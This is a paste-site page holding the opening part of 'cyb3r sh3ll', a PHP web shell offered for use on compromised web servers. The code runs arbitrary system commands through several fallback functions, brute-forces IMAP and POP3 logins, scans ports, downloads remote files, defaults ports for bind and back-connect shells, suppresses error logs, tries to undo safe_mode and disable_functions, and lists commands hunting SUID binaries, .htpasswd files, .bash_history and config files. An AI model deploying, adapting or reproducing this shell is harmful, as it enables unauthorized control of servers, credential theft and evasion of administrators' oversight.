Cyb3r Sh3ll - Shells-Center.Com


SUBMITTED BY: Guest

DATE: Sept. 6, 2014, 6:41 a.m.

FORMAT: PHP

SIZE: 300.7 kB

HITS: 573

  1. <?php
  2. //Authentication
  3. $lock = "on"; // set this to off if you dont need the login page
  4. $user = "cyber";
  5. $pass = "gladiator";
  6. $antiCrawler = "on"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
  7. $tracebackFeature = "off"; // set this feature to on to enable email alerts
  8. $log_email = "cyb3r.gladiat0r@gmail.com"; //Default e-mail for sending logs
  9. @ignore_user_abort(TRUE);
  10. @set_magic_quotes_runtime(0);
  11. error_reporting(5);
  12. $phpVersion = phpversion();
  13. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  14. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  15. $shver = "1.0"; //Current version
  16. if (!function_exists("getmicrotime")) {
  17. function getmicrotime() {
  18. list($usec, $sec) = explode(" ", microtime());
  19. return ((float)$usec + (float)$sec);
  20. }
  21. }
  22. define("starttime",getmicrotime());
  23. if (get_magic_quotes_gpc()) {
  24. if (!function_exists("strips")) {
  25. function strips(&$arr,$k="") {
  26. if (is_array($arr)) {
  27. foreach($arr as $k=>$v) {
  28. if (strtoupper($k) != "GLOBALS") {
  29. strips($arr["$k"]);
  30. }
  31. }
  32. } else {
  33. $arr = stripslashes($arr);
  34. }
  35. }
  36. }
  37. strips($GLOBALS);
  38. }
  39. foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
  40. if (!empty($unset_surl)) {setcookie("cyb3r_surl"); $surl = "";}
  41. elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("cyb3r_surl",$surl);}
  42. else {$surl = $_REQUEST["cyb3r_surl"]; //Set this cookie for manual SURL
  43. }
  44. $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
  45. if ($surl_autofill_include and !$_REQUEST["cyb3r_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
  46. if (empty($surl))
  47. { $surl = "?".$includestr; }//Self url
  48. $surl = htmlspecialchars($surl);
  49. $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
  50. $welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";
  51. //DON'T FORGOT ABOUT PASSWORD!!!
  52. $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
  53. $gzipencode = False; //Encode with gzip?
  54. $ax4 ="http://";
  55. $filestealth = TRUE; //if TRUE, don't change modify- and access-time
  56. $donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";
  57. $release = @php_uname('r');
  58. $kernel = @php_uname('s');
  59. $expltlink='http://www.exploit-db.com/search/?action=search&filter_exploit_text=';
  60. if( strpos('Linux', $kernel) !== false )
  61. $expltlink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
  62. else
  63. $expltlink .= urlencode( $kernel . ' ' . substr($release,0,3) );
  64. /* If you publish free shell and you wish add link to your site or any other information, put here your html. */
  65. $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
  66. $curdir = "./"; //start folder
  67. //$curdir = getenv("DOCUMENT_ROOT");
  68. $curdir = getcwd();
  69. $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
  70. $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
  71. $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  72. $sort_save = TRUE; //If TRUE then save sorting-position using cookies.
  73. if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
  74. function imaplogiN($host,$username,$password){
  75. $sock=fsockopen($host,143,$n,$s,5);
  76. $b=namE();
  77. $l=strlen($b);
  78. if(!$sock)return -1;
  79. fread($sock,1024);
  80. fputs($sock,"$b LOGIN $username $password\r\n");
  81. $res=fgets($sock,$l+4);
  82. if ($res == "$b OK")return 1;else return 0;
  83. fclose($sock);
  84. }
  85. function pop3logiN($server,$user,$pass){
  86. $sock=fsockopen($server,110,$en,$es,5);
  87. if(!$sock)return -1;
  88. fread($sock,1024);
  89. fwrite($sock,"user $user\n");
  90. $r=fgets($sock);
  91. if($r{0}=='-')return 0;
  92. fwrite($sock,"pass $pass\n");
  93. $r=fgets($sock);
  94. fclose($sock);
  95. if($r{0}=='+')return 1;
  96. return 0;
  97. }
  98. function check_urL($url,$method,$search,$timeout){
  99. if(empty($search))$search='200';
  100. $u=parse_url($url);
  101. $method=strtoupper($method);
  102. $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
  103. $data=(!empty($u['query']))?$u['query']:'';
  104. if(!empty($data))$data="?$data";
  105. $sock=@fsockopen($host,80,$en,$es,$timeout);
  106. if($sock){
  107. fputs($sock,"$method $file$data HTTP/1.0\r\n");
  108. fputs($sock,"Host: $host\r\n");
  109. if($method=='GET')fputs($sock,"\r\n");
  110. elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
  111. else return 0;
  112. if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
  113. while(!feof($sock)){
  114. $res=trim(fgets($sock));
  115. if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
  116. }
  117. fclose($sock);
  118. }
  119. return 0;
  120. }
  121. function snmpchecK($ip,$com,$timeout){
  122. $res=0;
  123. $n=chr(0x00);
  124. $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)).
  125. $com. chr(0xA0).
  126. chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
  127. chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
  128. chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
  129. chr(0x01). chr(0x01). $n. chr(0x05). $n;
  130. $sock=@fsockopen("udp://$ip",161);
  131. socket_set_timeout($sock,$timeout);
  132. @fputs($sock,$packet);
  133. socket_set_timeout($sock,$timeout);
  134. $res=fgets($sock);
  135. fclose($sock);
  136. return $res;
  137. }
  138. function checkthisporT($ip,$port,$timeout,$type=0){
  139. if(!$type){
  140. $scan=@fsockopen($ip,$port,$n,$s,$timeout);
  141. if($scan){fclose($scan);return 1;}
  142. }
  143. elseif(function_exists('socket_set_timeout')){
  144. $scan=@fsockopen("udp://".$ip,$port);
  145. if($scan){
  146. socket_set_timeout($scan,$timeout);
  147. @fwrite($scan,"\x00");
  148. $s=time();
  149. fread($scan,1);
  150. if((time()-$s)>=$timeout){fclose($scan);return 1;}
  151. }
  152. }
  153. return 0;
  154. }
  155. function get_sw_namE($host,$timeout){
  156. $sock=@fsockopen($host,80,$en,$es,$timeout);
  157. if($sock){
  158. $page=namE().namE();
  159. fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
  160. while(!feof($sock)){
  161. $con=fgets($sock);
  162. if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
  163. }
  164. fclose($sock);
  165. return -1;
  166. }return 0;
  167. }
  168. function getDisabledFunctions(){
  169. if(!ini_get('disable_functions'))
  170. {
  171. echo "None";
  172. }
  173. else
  174. {
  175. echo @ini_get('disable_functions');
  176. }
  177. }
  178. function showsizE($size){
  179. if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
  180. elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
  181. elseif ($size>=1024)$size = round(($size/1024),2)." KB";
  182. else $size .= " B";
  183. return $size;
  184. }
  185. function whereistmP(){
  186. $uploadtmp=ini_get('upload_tmp_dir');
  187. $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
  188. if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
  189. if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
  190. if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
  191. if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
  192. if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
  193. return ".";
  194. }
  195. function downloadiT($get,$put){
  196. $fo=@strtolower(ini_get('allow_url_fopen'));
  197. if($fo || $fo=='on')$con=file_get_contents($get);
  198. else{
  199. $u=parse_url($get);
  200. $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
  201. $url=fsockopen($host, 80, $en, $es, 12);
  202. fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
  203. $tmp=$con='';
  204. while($tmp!="\r\n")$tmp=fgets($url);
  205. while(!feof($url))$con.=fgets($url);
  206. }
  207. $mk=file_put_contents($put,$con);
  208. if($mk)return 1;
  209. return 0;
  210. }
  211. function flusheR(){
  212. flush();@ob_flush();
  213. }
  214. function namE(){
  215. $name='';
  216. srand((double)microtime()*100000);
  217. for ($i=0;$i<=rand(3,10);$i++){
  218. $name.=chr(rand(97,122));
  219. }
  220. return $name;
  221. }
  222. function hlinK($str=""){
  223. $myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','sec','cP','mV','rN','deL');
  224. $ret=$_SERVER['PHP_SELF']."?";
  225. $new=explode("&",$str);
  226. foreach ($_GET as $key => $v){
  227. $add=1;
  228. foreach($new as $m){
  229. $el = explode("=", $m);
  230. if ($el[0]==$key)$add=0;
  231. }
  232. if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
  233. }
  234. $ret.=$str;
  235. return $ret;
  236. }
  237. function shelL($command){
  238. global $windows,$disablefunctions;
  239. $exec = '';$output= '';
  240. $dep[]=array('pipe','r');$dep[]=array('pipe','w');
  241. if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
  242. elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
  243. elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
  244. elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
  245. elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
  246. elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
  247. elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
  248. return $exec;
  249. }
  250. // Registered file-types.
  251. // array(
  252. // "{action1}"=>array("ext1","ext2","ext3",...),
  253. // "{action2}"=>array("ext4","ext5","ext6",...),
  254. // ...
  255. // )
  256. $ftypes = array(
  257. "html"=>array("html","htm","shtml"),
  258. "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  259. "exe"=>array("sh","install","bat","cmd"),
  260. "ini"=>array("ini","inf"),
  261. "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  262. "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  263. "sdb"=>array("sdb"),
  264. "phpsess"=>array("sess"),
  265. "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  266. );
  267. // Registered executable file-types.
  268. // array(
  269. // string "command{i}"=>array("ext1","ext2","ext3",...),
  270. // ...
  271. // )
  272. // {command}: %f% = filename
  273. $exeftypes = array(
  274. getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  275. "perl %f%" => array("pl","cgi")
  276. );
  277. /* Highlighted files.
  278. array(
  279. i=>array({regexp},{type},{opentag},{closetag},{break})
  280. ...
  281. )
  282. string {regexp} - regular exp.
  283. int {type}:
  284. 0 - files and folders (as default),
  285. 1 - files only, 2 - folders only
  286. string {opentag} - open html-tag, e.g. "<b>" (default)
  287. string {closetag} - close html-tag, e.g. "</b>" (default)
  288. bool {break} - if TRUE and found match then break
  289. */
  290. $regxp_highlight = array(
  291. array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  292. array("config.php",1) // example
  293. );
  294. $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
  295. // array (i=>{letter} ...); string {letter} - letter of a drive
  296. //$safemode_diskettes = range("a","z");
  297. $hexdump_lines = 8;// lines in hex preview file
  298. $hexdump_rows = 24;// 16, 24 or 32 bytes in one line
  299. $cx7 =".com";
  300. $nixpwdperpage = 100; // Get first N lines from /etc/passwd
  301. $bindport_pass = "cyb3r"; // default password for binding
  302. $bindport_port = "31373"; // default port for binding
  303. $bc_port = "31373"; // default port for back-connect
  304. $cx4 ="/x.";
  305. $datapipe_localport = "8081"; // default port for datapipe
  306. // Command-aliases
  307. if (!$win)
  308. {
  309. $cmdaliases = array(
  310. array("-----------------------------------------------------------", "ls -la"),
  311. array("find all suid files", "find / -type f -perm -04000 -ls"),
  312. array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  313. array("find all sgid files", "find / -type f -perm -02000 -ls"),
  314. array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  315. array("find config.inc.php files", "find / -type f -name config.inc.php"),
  316. array("find config* files", "find / -type f -name \"config*\""),
  317. array("find config* files in current dir", "find . -type f -name \"config*\""),
  318. array("find all writable folders and files", "find / -perm -2 -ls"),
  319. array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
  320. array("find all service.pwd files", "find / -type f -name service.pwd"),
  321. array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  322. array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  323. array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  324. array("find all .bash_history files", "find / -type f -name .bash_history"),
  325. array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  326. array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  327. array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  328. array("list file attributes on a Linux second extended file system", "lsattr -va"),
  329. array("show opened ports", "netstat -an | grep -i listen")
  330. );
  331. }
  332. else
  333. {
  334. $cmdaliases = array(
  335. array("-----------------------------------------------------------", "dir"),
  336. array("show opened ports", "netstat -an")
  337. );
  338. }
  339. $sess_cookie = "cyb3rvars"; // Cookie-variable name
  340. $usefsbuff = TRUE; //Buffer-function
  341. $px7 ="html";
  342. $copy_unset = FALSE; //Remove copied files from buffer after pasting
  343. //Quick launch
  344. $quicklaunch = array(
  345. array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
  346. array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
  347. array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
  348. array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
  349. array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
  350. array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
  351. array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
  352. array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
  353. array("<b>Shell</b>",$surl."act=shells&d=%d"),
  354. array("<b>Cracker</b>",$surl."act=cracker&d=%d"),
  355. array("<b>Scanner</b>",$surl."act=scanner&d=%d"),
  356. array("<b>Net Tools</b>",$surl."act=nettools&d=%d"),
  357. array("<b>SQL</b>",$surl."act=sql&d=%d"),
  358. array("<b>PHP-code</b>",$surl."act=phpcode&d=%d"),
  359. array("<b>Mailer</b>",$surl."act=mailer&d=%d"), //update this section copy from b3t4k shell hardeep
  360. array("<b>DOS</b>",$surl."act=dos&d=%d"), //update this section copy from b3t4k shell hardeep
  361. array("<b>Local Domain</b>",$surl."act=localdomain&d=%d"), //update this section copy from b3t4k shell hardeep
  362. array("<b>Upload</b>",$surl."act=upload&d=%d"),
  363. array("<b>About</b>",$surl."act=about&d=%d"), //update this section copy from b3t4k shell hardeep
  364. );
  365. //Highlight-code colors
  366. $highlight_background = "#c0c0c0";
  367. $highlight_bg = "#FFFFFF";
  368. $highlight_comment = "#6A6A6A";
  369. $highlight_default = "#0000BB";
  370. $highlight_html = "#1300FF";
  371. $highlight_keyword = "#007700";
  372. $highlight_string = "#000000";
  373. @$f = $_REQUEST["f"];
  374. @extract($_REQUEST["cyb3rcook"]);
  375. //END CONFIGURATION
  376. // -------------- Traceback Functions
  377. function sendLoginAlert()
  378. {
  379. global $ownerEmail;
  380. global $url;
  381. $ref=$_SERVER['HTTP_REFERER'];
  382. $agent=$_SERVER['HTTP_USER_AGENT'];
  383. $accesedIp = $_SERVER['REMOTE_ADDR'];
  384. $randomInt = rand(0,1000000); # to avoid id blocking
  385. $from = "cyb3r-sh3ll$randomInt@cyb3r.gladiat0r.com";
  386. //echo $from;
  387. if(function_exists('mail'))
  388. {
  389. $subject = "Shell Accessed -- cyb3r-Sh3ll --";
  390. $message = "
  391. Hey Owner ,
  392. Your Shell(cyb3r-Sh3ll) located at $url was accessed by $accesedIp this mail refered by $ref
  393. Your shell was accesed by $agent
  394. If its not you :-
  395. 1. Please check if the shell is secured.
  396. 2. Change your user name and Password.
  397. 3. Check if lock is 0n!
  398. Thanking You
  399. Yours Faithfully
  400. cyb3r Sh3ll
  401. ";
  402. mail($ownerEmail,$subject,$message,'From:'.$from);
  403. }
  404. }
  405. //---------------------------------------------------------
  406. if(function_exists('session_start') && $lock == 'on')
  407. {
  408. session_start();
  409. }
  410. else
  411. {
  412. // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported
  413. $lock = 'off';
  414. }
  415. //logout
  416. if(isset($_GET['logout']) && $lock == 'on')
  417. {
  418. $_SESSION['authenticated'] = 0;
  419. session_destroy();
  420. header("location: ".$_SERVER['PHP_SELF']);
  421. }
  422. /***************** Restoring *******************************/
  423. ini_restore("safe_mode_include_dir");
  424. ini_restore("safe_mode_exec_dir");
  425. ini_restore("disable_functions");
  426. ini_restore("allow_url_fopen");
  427. ini_restore("safe_mode");
  428. ini_restore("open_basedir");
  429. if(function_exists('ini_set'))
  430. {
  431. ini_set('error_log',NULL); // No alarming logs
  432. ini_set('log_errors',0); // No logging of errors
  433. ini_set('file_uploads',1); // Enable file uploads
  434. ini_set('allow_url_fopen',1); // allow url fopen
  435. }
  436. else
  437. {
  438. ini_alter('error_log',NULL);
  439. ini_alter('log_errors',0);
  440. ini_alter('file_uploads',1);
  441. ini_alter('allow_url_fopen',1);
  442. }
  443. // ----------------------------------------------------------------------------------------------------------------
  444. // \/Next code isn't for editing\/
  445. @set_time_limit(0);
  446. $tmp = array();
  447. foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
  448. $s = "!^(".implode("|",$tmp).")$!i";
  449. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"#\">cyb3r sh3ll</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
  450. ?>
  451. <html>
  452. <head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us">
  453. <title>cyb3r sh3ll | India - <?php echo getenv("HTTP_HOST"); ?></title>
  454. <?php
  455. if($antiCrawler != 'off')
  456. {
  457. ?>
  458. <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
  459. <?php
  460. }
  461. ?>
  462. <STYLE>
  463. TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #15354C; scrollbar-shadow-color: #15354C; scrollbar-highlight-color: #15354C; scrollbar-3dlight-color: #15354C scrollbar-darkshadow-color: #15354C; scrollbar-track-color: #050E14; scrollbar-arrow-color: #D9D9D9; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #050e14;}</style>
  464. </head>
  465. <BODY text=#ffffff bottomMargin=0 bgColor=#050e14 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
  466. <?php
  467. if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
  468. {
  469. if( $_POST['user'] == $user &&
  470. $_POST['pass'] == $pass )
  471. {
  472. $_SESSION['authenticated'] = 1;
  473. // --------------------- Tracebacks --------------------------------
  474. if($tracebackFeature == 'On')
  475. {
  476. sendLoginAlert();
  477. }
  478. // ------------------------------------------------------------------
  479. }
  480. }
  481. if($lock == 'off')
  482. {?>
  483. <p><font color=red><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></font></p>
  484. <?php
  485. }
  486. if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
  487. {
  488. ?>
  489. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor='#15354c' borderColorLight='#c0c0c0' border=1 bordercolor='#C0C0C0'>
  490. <tr><td valign='top'><center><font face="times, serif" size="3" color="white">Welcome to the most advanced PHP web Shell- <b><font color=orange>cyb</font>3r Sh<font color=green>3ll</font></b> :: By cyb3r gl4d!470r ...</font></center></td>
  491. </tr>
  492. </table>
  493. <br/>
  494. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0 bordercolor='#C0C0C0'>
  495. <tr>
  496. <td width="50%"><center><img src="http://s15.postimage.org/94kp4a0ej/indian_flag.png" /></center></td>
  497. <td><center><img src="http://s15.postimage.org/whiqmsgi3/gladiator.png" width="352px" height="500px"/></center></td>
  498. </tr>
  499. </table>
  500. <div style="position:absolute; border-style:solid;border-width:0px; top:280px;left:280px; right:430px; bottom:180px;" >
  501. <center><font face="times, serif" color="white">
  502. <h1><?php echo $welcome; ?></h1><br /><br />
  503. <form method="POST" action="">
  504. <input name="user" value="Username"/> <input name="pass" type="password" value="Password"/> <input type="Submit" value="Own This Box!"/>
  505. </form>
  506. <font size="3">Coded by cyb3r 9ladiat0r for all hacking communities working for my motherland.......<br/><br/>
  507. Always there to serve my country, My India on any Terms...</font>
  508. </font>
  509. </center>
  510. </div>
  511. <br/>
  512. <?php
  513. }
  514. //---------------------------------- We are authenticated now-------------------------------------
  515. //Launch the shell
  516. else
  517. {
  518. if ($act != "img")
  519. {
  520. $lastdir = realpath(".");
  521. chdir($curdir);
  522. if ($selfwrite or $updatenow) {@ob_clean(); cyb3r_getupdate($selfwrite,1); exit;}
  523. $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  524. if (!is_array($sess_data)) {$sess_data = array();}
  525. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  526. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  527. $disablefunc = @ini_get("disable_functions");
  528. if (!empty($disablefunc))
  529. {
  530. $disablefunc = str_replace(" ","",$disablefunc);
  531. $disablefunc = explode(",",$disablefunc);
  532. }
  533. if (!function_exists("cyb3r_buff_prepare"))
  534. {
  535. function cyb3r_buff_prepare()
  536. {
  537. global $sess_data;
  538. global $act;
  539. foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  540. foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  541. $sess_data["copy"] = array_unique($sess_data["copy"]);
  542. $sess_data["cut"] = array_unique($sess_data["cut"]);
  543. sort($sess_data["copy"]);
  544. sort($sess_data["cut"]);
  545. if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  546. else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  547. }
  548. }
  549. cyb3r_buff_prepare();
  550. if (!function_exists("cyb3r_sess_put"))
  551. {
  552. function cyb3r_sess_put($data)
  553. {
  554. global $sess_cookie;
  555. global $sess_data;
  556. cyb3r_buff_prepare();
  557. $sess_data = $data;
  558. $data = serialize($data);
  559. setcookie($sess_cookie,$data);
  560. }
  561. }
  562. foreach (array("sort","sql_sort") as $v)
  563. {
  564. if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  565. if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  566. }
  567. if ($sort_save)
  568. {
  569. if (!empty($sort)) {setcookie("sort",$sort);}
  570. if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  571. }
  572. if (!function_exists("str2mini"))
  573. {
  574. function str2mini($content,$len)
  575. {
  576. if (strlen($content) > $len)
  577. {
  578. $len = ceil($len/2) - 2;
  579. return substr($content, 0,$len)."...".substr($content,-$len);
  580. }
  581. else {return $content;}
  582. }
  583. }
  584. if (!function_exists("view_size"))
  585. {
  586. function view_size($size)
  587. {
  588. if (!is_numeric($size)) {return FALSE;}
  589. else
  590. {
  591. if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  592. elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  593. elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  594. else {$size = $size . " B";}
  595. return $size;
  596. }
  597. }
  598. }
  599. if (!function_exists("fs_copy_dir"))
  600. {
  601. function fs_copy_dir($d,$t)
  602. {
  603. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  604. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  605. $h = opendir($d);
  606. while (($o = readdir($h)) !== FALSE)
  607. {
  608. if (($o != ".") and ($o != ".."))
  609. {
  610. if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  611. else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  612. if (!$ret) {return $ret;}
  613. }
  614. }
  615. closedir($h);
  616. return TRUE;
  617. }
  618. }
  619. if (!function_exists("fs_copy_obj"))
  620. {
  621. function fs_copy_obj($d,$t)
  622. {
  623. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  624. $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
